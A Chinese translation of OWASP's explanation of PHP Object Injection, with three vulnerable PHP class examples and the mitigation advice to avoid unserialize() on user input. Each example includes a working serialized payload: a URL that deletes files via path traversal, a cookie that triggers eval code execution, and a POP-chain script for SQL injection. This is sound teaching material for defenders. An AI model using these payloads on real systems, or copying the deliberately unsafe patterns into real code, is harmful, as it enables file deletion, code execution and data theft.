From:[PHP Object Injection](https://www.owasp.org/index.php/PHP_Object_Injection)
Last revision (mm/dd/yy): 01/7/2015
译者:李秋豪 Wednesday, 24. May 2017 05:48PM

描述

PHP对象注入是一个允许骇客展开各种恶意攻击的应用级漏洞,比如说代码注入SQL注入目录遍历应用程序拒绝服务 (取决于具体的上下文/环境)。当用户的请求在传给反序列化函数unserialize()之前没有被正确的过滤时就会产生该漏洞。因为PHP允许对象序列化,攻击者就可以提交特定的序列化的字符串给一个具有该漏洞的unserialize函数,最终导致一个在该应用范围内的任意PHP对象注入。

为了正确的利用一个PHP对象注入漏洞,两个条件必须满足:

  1. 该网络应用必须有一个拥有PHP魔术方法(比如说__wakeup或__destruct)的类,以此来承载运行恶意攻击请求或者开始POP chain
  2. 所有攻击过程中利用的类必须在调用unserialize()之前就已经声明了,否则必须有类的自动加载

例子

例一

下面的例子显示了一个具有PHP对象注入漏洞的类(__destruct方法):

class Example1

{

   public $cache_file;

   function __construct()

   {

      // some PHP code...

   }

   function __destruct()

   {

      $file = "/var/www/cache/tmp/{$this->cache_file}";

      if (file_exists($file)) @unlink($file);

   }

}

// some PHP code...

$user_data = unserialize($_GET['data']);

// some PHP code...

在这个例子中,攻击者可以通过目录遍历攻击删掉任意一个文件,例如提交以下一个URL:

http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}

例二

下面的例子显示了一个具有PHP对象注入漏洞的类(__wakeup方法):

class Example2

{

   private $hook;

   function __construct()

   {

      // some PHP code...

   }

   function __wakeup()

   {

      if (isset($this->hook)) eval($this->hook);

   }

}

// some PHP code...

$user_data = unserialize($_COOKIE['data']);

// some PHP code...

在这个例子中,攻击者可以通过发送如下的HTTP请求来进行代码注入攻击:

GET /vuln.php HTTP/1.0

Host: testsite.com

Cookie: data=O%3A8%3A%22Example2%22%3A1%3A%7Bs%3A14%3A%22%00Example2%00hook%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D

Connection: close

这里的cookie变量“data”是通过下面的脚本产生的:

class Example2

{

   private $hook = "phpinfo();";

}

print urlencode(serialize(new Example2));

例三

最后一个例子展示了利用“POP chain”进行SQL注入的可能性,例如利用一个__toString方法:

class Example3

{

   protected $obj;

   function __construct()

   {

      // some PHP code...

   }

   function __toString()

   {

      if (isset($this->obj)) return $this->obj->getValue();

   }

}

// some PHP code...

$user_data = unserialize($_POST['data']);

// some PHP code...

如果$user_data是一个“Example3”类的对象并且它在代码中会被当做一个字符串,那么它的__toString方法就会被调用。因为__toString会调用对象中的getValue获取对象中的属性,所以有可能将设置这个属性于任意对象并运行getValue方法——如果可以的话,否则__call方法就会被调用。假设以下类型在应用中是可获得的或者是自动加载的:

class SQL_Row_Value

{

   private $_table;

   // some PHP code...

   function getValue($id)

   {

      $sql = "SELECT * FROM {$this->_table} WHERE id = " . (int)$id;

      $result = mysql_query($sql, $DBFactory::getConnection());

      $row = mysql_fetch_assoc($result);

      return $row['value'];

   }

}

在这个例子中攻击者可能有机会通过提交POST请求进行SQL注入攻击,请求中的“DATA”参量按如下脚本生成:

class SQL_Row_Value

{

   private $_table = "SQL Injection";

}

class Example3

{

   protected $obj;

   function __construct()

   {

      $this->obj = new SQL_Row_Value;

   }

}

print urlencode(serialize(new Example3));

相关的控制方法

防范方法

请不要对用户的输入使用unserialize()进行反序列化,应该使用JSON的方法。

参考

PHP:反序列化

魔术方法

PHP RFC: 安全的反序列化unserialize()

PHP漏洞利用 Stefan Esser, POC 2009

PHP漏洞利用之代码重用/返回导向编程

PHP对象注入 PHP Object Injection的更多相关文章

  1. Natas Wargame Level26 Writeup(PHP对象注入)

    源码: <?php // sry, this is ugly as hell. // cheers kaliman ;) // - morla class Logger{ private $lo ...

  2. joomla对象注入漏洞分析

    0x00 漏洞简单介绍 jooomla 1.5 到 3.4.5 的全部版本号中存在反序列化对象造成对象注入的漏洞,漏洞利用无须登录,直接在前台就可以运行随意PHP代码. Joomla 安全团队紧急公布 ...

  3. PHP程序员如何理解依赖注入容器(dependency injection container)

    背景知识 传统的思路是应用程序用到一个Foo类,就会创建Foo类并调用Foo类的方法,假如这个方法内需要一个Bar类,就会创建Bar类并调用Bar类的方法,而这个方法内需要一个Bim类,就会创建Bim ...

  4. Scalaz(16)- Monad:依赖注入-Dependency Injection By Reader Monad

    在上一篇讨论里我们简单的介绍了一下Cake Pattern和Reader Monad是如何实现依赖注入的.主要还是从方法上示范了如何用Cake Pattern和Reader在编程过程中解析依赖和注入依 ...

  5. [.NET] 使用Json.NET提供依赖注入功能(Dependence Injection)

    [.NET] 使用Json.NET提供依赖注入功能(Dependence Injection) 前言 在一些小型项目的开发情景里,系统不需要大型DI Framework所提供的:单一对象生成.生命周期 ...

  6. joomla \libraries\joomla\session\session.php 反序列化截断畸形字符串导致对象注入漏洞

    catalog . 漏洞描述 . PHP SESSION持久化 . PHP 序列化/反序列化内核实现 . 漏洞代码分析 . POC构造技巧 . 防御方案 . Code Pathc方案 1. 漏洞描述 ...

  7. phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via unserialize Vul Object Injection PMASA-2010-4

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 对这个漏洞简单的概括如下 . "/scripts/setup.php&q ...

  8. Sring控制反转(Inversion of Control,Ioc)也被称为依赖注入(Dependency Injection,DI)原理用反射和代理实现

    首先我有一个数据访问层接口: public interface StudentDao { void save(Student stu); } 和实现类: 1.mysql实现类 public class ...

  9. 深入理解PHP对象注入

    0x00 背景 php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险,为了理解这个漏洞,请读者具备基础的php知识. 0x01 漏洞案例 如果你觉得这是个渣渣洞,那么请看 ...

随机推荐

  1. spring AOP 和自定义注解进行身份验证

    一个SSH的项目(springmvc+hibernate),需要提供接口给app使用.首先考虑的就是权限问题,app要遵循极简模式,部分内容无需验证,用过滤器不能解决某些无需验证的方法 所以最终选择用 ...

  2. java中的内存溢出和内存泄漏

    内存溢出:对于整个应用程序来说,JVM内存空间,已经没有多余的空间分配给新的对象.所以就发生内存溢出. 内存泄露:在应用的整个生命周期内,某个对象一直存在,且对象占用的内存空间越来越大,最终导致JVM ...

  3. [转载] zookeeper工作原理、安装配置、工具命令简介

    转载自http://www.cnblogs.com/kunpengit/p/4045334.html 1 Zookeeper简介Zookeeper 是分布式服务框架,主要是用来解决分布式应用中经常遇到 ...

  4. SSD中的GC机制以及Trim

    GC(Garbagecollection)垃圾回收  所谓GC就是把一个闪存块里的"有效"页数据复制到一个"空白"块里,然后把这个块完全擦除.GC是 SSD里的 ...

  5. SHA1 安全哈希算法(Secure Hash Algorithm)

    安全哈希算法(Secure Hash Algorithm)主要适用于数字签名标准 (Digital Signature Standard DSS)里面定义的数字签名算法(Digital Signatu ...

  6. SpringMVC 视图解析器

    SpringMVC 视图解析器 还记得SpringMVC 快速入门中,dispatcher-servlet.xml 配置的视图解析器么.它是SpringMVC 的核心知识点.本章节比较简单,明白视图解 ...

  7. Java爬虫框架WebMagic——入门(爬取列表类网站文章)

    初学爬虫,WebMagic作为一个Java开发的爬虫框架很容易上手,下面就通过一个简单的小例子来看一下. WebMagic框架简介 WebMagic框架包含四个组件,PageProcessor.Sch ...

  8. Vue-Access-Control:前端用户权限控制解决方案

    原文地址:http://refined-x.com/2017/11/28/Vue2.0用户权限控制解决方案/ Vue-Access-Control是一套基于Vue/Vue-Router/axios 实 ...

  9. 去培训机构参加IT培训值不值

    近几年,IT培训机构可谓是琳琅满目,稂莠不齐.培训Java的,培训PHP的,培训大数据的等等吧,不一而足. 自己也算是IT技术圈子待了好多年了,面试过一些机构培训出来的学生,也有几个好哥们在培训机构做 ...

  10. BST 解析 (二)height and deletion

    前面一章介绍了BST的结构和一些简单的基本功能,例如:insert,findMin,nextLarger等等.这一节主要讲解一些BST的delete node操作还有BST的height的分析以及一些 ...